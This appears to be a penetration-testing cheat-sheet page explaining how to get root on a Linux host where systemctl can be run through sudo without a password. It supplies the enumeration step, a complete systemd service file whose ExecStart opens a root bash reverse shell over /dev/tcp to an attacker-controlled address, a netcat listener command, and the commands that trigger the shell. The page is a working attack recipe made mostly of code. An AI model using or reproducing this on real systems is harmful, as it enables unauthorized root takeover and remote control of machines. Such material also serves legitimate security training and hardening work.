Sudo Systemctl Privilege Escalation
Last modified: 2023-02-05
sudo systemctl is vulnerable to privilege escalation by modifying the configuration file.
Investigation
sudo -l
(ALL) NOPASSWD: systemctl
If we can run "systemctl" command as root, and we can edit the config file, then we might be a root user.
Exploitation
1. Update the Config File
We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.
[Unit]
This is an example service.
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'
[Install]
WantedBy=multi-user.target
Replace “<local-ip>” with your local ip address.
2. Start Listener in Local Machine
Then start listener for getting a root shell.
nc -lvnp 4444
3. Restart the Service
Reload the daemon and restart.
sudo systemctl daemon-reload
sudo systemctl restart example.service
Now we should get a shell in local machine.